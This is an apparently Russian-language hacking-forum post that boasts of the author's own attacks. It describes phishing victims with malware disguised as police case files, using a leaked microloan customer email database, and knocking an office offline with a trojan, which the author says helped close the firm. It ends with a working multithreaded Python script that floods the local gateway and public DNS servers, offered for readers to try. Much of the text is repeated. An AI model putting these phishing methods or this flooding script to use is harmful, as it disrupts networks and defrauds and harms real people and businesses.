- 18
- 0
- 6 Окт 2025
Здравствуйте! В этой статье хотел подробно расскзать о DDoS Атаках и для чего их проводят.
Определение из гугла:
DDoS — это (Distributed Denial of Service, "распределенный отказ в обслуживании") — вид кибератаки, цель которой перегрузить целевой сервер, сервис или сеть огромным потоком ложных запросов из множества источников так, чтобы он стал недоступным для обычных пользователей.
Если же говорить простыми словами, то у хакера в распроряжении есть большое количество устройств (ботов), и он может ими удаленно уравлять (ботмасер). При DDoS атаке главноый целью является либо замедлить работу сайта, либо же полностью заблокировать к нем доступ, путём отправки запросов с разных IP в большом количестве.
Как хакеры создают базу ботов и получают над ними полный доступ?
- Самый лучший вариант - обычный фишинг через почты. Например раньше я представлялся лейтенантом полиции и отправлял якобы материал дела (exe файл, замаскированный под .rar). Люди испытывали страх и интерес, и непроверяя открывали файл. Базу почт я взял из слитой базы МФО ДеньгиСразу. Также я создал собственную консоль при вводе команды в которую, она производилась на всех заражённых ПК.
Отличия DoS и DDoS
(Простейший план работы DDoS атаки)
Также существует множество платных, готовых ботнетов, с помщью которых выможете сразу направить запросы на сервер.
Для DDoS атаки требуется многопоточность для увелеичения эффективности. Например с одног компьютера из 500 отправляеся не 1 запрос в секунду, а целых 5. Это означает что всего запросов в секунду на сайт будет 2500! Чем крупнее сайт, тем крупнее нужен ботнет.
Моя собственная техника IDoS (Inter DoS)
Приведу пример и личного опыта. Нужно было сложить сеть в офисе одной конторы (сервер сайа находился в офисе). Я отправил им фейковую заявку с описанием заказа в формате .txt (конечно же это был троян). После того как кто-то открыл файл, я запускал скрипт, который сначала рапрострняется по локальной сети, а после запускает другой скрипт, который ведет атаку не на внешниё ресурс, а на локальную сеть. Буквально через 3-4 минуты, все компьютеры в офисе потеряли доступ в интернет, вместе с сервером и сайтом. Через неделю контора закрылась, так как итак была в кризисе, плюс я добавил)
Скрипт для IDOS (тестируйте, отключается перезагрузкой ПК)
Определение из гугла:
DDoS — это (Distributed Denial of Service, "распределенный отказ в обслуживании") — вид кибератаки, цель которой перегрузить целевой сервер, сервис или сеть огромным потоком ложных запросов из множества источников так, чтобы он стал недоступным для обычных пользователей.
Если же говорить простыми словами, то у хакера в распроряжении есть большое количество устройств (ботов), и он может ими удаленно уравлять (ботмасер). При DDoS атаке главноый целью является либо замедлить работу сайта, либо же полностью заблокировать к нем доступ, путём отправки запросов с разных IP в большом количестве.
Как хакеры создают базу ботов и получают над ними полный доступ?
- Самый лучший вариант - обычный фишинг через почты. Например раньше я представлялся лейтенантом полиции и отправлял якобы материал дела (exe файл, замаскированный под .rar). Люди испытывали страх и интерес, и непроверяя открывали файл. Базу почт я взял из слитой базы МФО ДеньгиСразу. Также я создал собственную консоль при вводе команды в которую, она производилась на всех заражённых ПК.
Отличия DoS и DDoS
- DoS — атака исходит с одного источника.
- DDoS — атака осуществляется с множества источников, что усложняет её обнаружение и блокировку.
(Простейший план работы DDoS атаки)
Также существует множество платных, готовых ботнетов, с помщью которых выможете сразу направить запросы на сервер.
Для DDoS атаки требуется многопоточность для увелеичения эффективности. Например с одног компьютера из 500 отправляеся не 1 запрос в секунду, а целых 5. Это означает что всего запросов в секунду на сайт будет 2500! Чем крупнее сайт, тем крупнее нужен ботнет.
Моя собственная техника IDoS (Inter DoS)
Приведу пример и личного опыта. Нужно было сложить сеть в офисе одной конторы (сервер сайа находился в офисе). Я отправил им фейковую заявку с описанием заказа в формате .txt (конечно же это был троян). После того как кто-то открыл файл, я запускал скрипт, который сначала рапрострняется по локальной сети, а после запускает другой скрипт, который ведет атаку не на внешниё ресурс, а на локальную сеть. Буквально через 3-4 минуты, все компьютеры в офисе потеряли доступ в интернет, вместе с сервером и сайтом. Через неделю контора закрылась, так как итак была в кризисе, плюс я добавил)
Скрипт для IDOS (тестируйте, отключается перезагрузкой ПК)
Код:
import threading
import socket
import subprocess
import time
import os
import platform
def full_network_crash():
print("[ИНИЦИАЛИЗАЦИЯ] Запуск полного блокировщика сети...")
# Получаем конфигурацию сети
def get_network_info():
try:
if platform.system() == "Windows":
result = subprocess.check_output("ipconfig", shell=True)
lines = result.decode().split('\n')
gateway = "192.168.1.1"
for line in lines:
if "Шлюз" in line or "Gateway" in line:
gateway = line.split(":")[1].strip()
break
return gateway
else:
result = subprocess.check_output("ip route | grep default", shell=True)
return result.decode().split()[2]
except:
return "192.168.1.1"
gateway_ip = get_network_info()
print(f"[ЦЕЛЬ] Основной шлюз: {gateway_ip}")
# Многопоточная атака на шлюз
def gateway_ddos():
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((gateway_ip, 80))
for _ in range(100):
s.send(os.urandom(4096))
s.close()
except:
pass
# Блокировка DNS серверов
def dns_attack():
dns_servers = ["8.8.8.8", "1.1.1.1", "8.8.4.4"]
while True:
try:
for dns in dns_servers:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(os.urandom(512), (dns, 53))
sock.close()
except:
pass
# Запуск 200 потоков атаки
for i in range(300):
threading.Thread(target=gateway_ddos, daemon=True).start()
for i in range(300):
threading.Thread(target=dns_attack, daemon=True).start()
print("[УСПЕХ] Сеть заблокирована. Интернет недоступен.")
while True:
time.sleep(60)
if __name__ == "__main__":
full_network_crash()
Последнее редактирование:
